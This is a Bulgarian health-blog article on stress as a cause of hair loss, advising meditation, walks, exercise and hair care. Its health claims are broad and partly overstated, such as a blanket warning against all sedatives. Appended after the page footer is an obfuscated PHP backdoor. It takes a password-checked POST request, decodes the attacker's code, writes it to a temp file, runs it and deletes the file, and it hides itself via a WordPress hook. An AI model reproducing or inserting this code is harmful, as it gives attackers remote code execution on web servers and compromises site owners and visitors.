Стресът като основна причина за косопад | Косопад

Стресът отключва поява на косопад

стрес и косопад

Косопад и стрес

Съвременният човек, а още повече съвременният българин, живее в силен и непрекъснат стрес. Безчинствата и пълната неангажираност на политическата класа към случващото се в държавата вече предизвикаха не един катаклизъм, докарвайки на хората различни видове болести.

Специалисти по неврология са категорични, че именно стресът е сред основните виновници за поява на косопад, сърдечни болести, проблеми с бъбреците, херпеси, психични разстройства и още цял куп заболявания.

Как обаче да разберем, че сме станали поредната жертва на напрежението и че имаме нужда от квалифицирана медицинска помощ?

Симптомите са най – различни, а тук ще изредим основните от тях и защо всъщност нервното напрежение предизвиква косопад.

Характерни симптоми на стреса

Най – честите признаци за поява на стрес са непрекъснато чувство за вътрешно напрежение, необясним страх от утрешния ден, постоянна напрегнатост и силна (понякога безпричинна) тревога. Специалистите са категорични, че ако забележим дори и един от тези симптоми, трябва да потърсим незабавна консултация с лекар, за да пресечем по – нататъшното влошаване на здравословното състояние.

Стрес и косопад

Стресът предизвиква косопад по химически път. Дерматолози обясняват, че когато човек е подложен на силно напрежение, химическите вещества донасят до фоликулите на косъма определени сигнали, които карат тялото да премине в защитен режим и на практика „приспиват” растежа на косата.

Косопад при мъжете

Стресът е честа причина за косопад

По време на такъв етап косъмът спира да расте и въпреки че косата продължава да капе с обичайните темпове, скоро се появяват олисели петна, защото няма растеж на нови косъмчета. Ако успеем да преборим стресовия период, космените фоликули остават във фаза на летаргия още около три – четири месеца и чак след това косата започна да расте отново. Това обаче няма да се случи ако стресът продължи.

Как да се предпазим от стрес и косопад?

В никакъв случай не прибягвайте до употребата на успокоителни медикаменти. Скоро след началото на приема организмът започва да привиква към тях и за да действат, трябва да приемате все по – големи дози. Освен това повечето от тях съвсем не са безопасни и могат само да влошат състоянието ви.

За да преодолеете последствията от силния стрес, колкото и да е трудно, направете всичко възможно да си осигурите поне един час на денонощие за разпускане (медитация). През това време забравете за всичко останало – изключете телефоните, приспете децата, загасете телевизора и т. н. Ако трябва просто легнете на тишина и гледайте в тавана без да мислите за нищо.

При подобни ситуации е задължително да се обърнете за помощ към природата и се разхождайте поне по един час на ден в най – близкия парк. Спортът също е перфектно средство за освобождаване на напрежението, а 10 – 15 минути ежедневна двигателна активност ще направят чудеса.

За да предотвратите появата на косопад третирайте косата с подходяща рецепта за подхранване, поддържайте добра хигиена на главата, не прекалявайте с разкрасяващите процедури, използвайте подходящ лосион срещу косопад.

12. април 2013 15:41:27 от Косопад
Категории: Косопад – Статии | Етикети: , , | 1 682 коментари

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}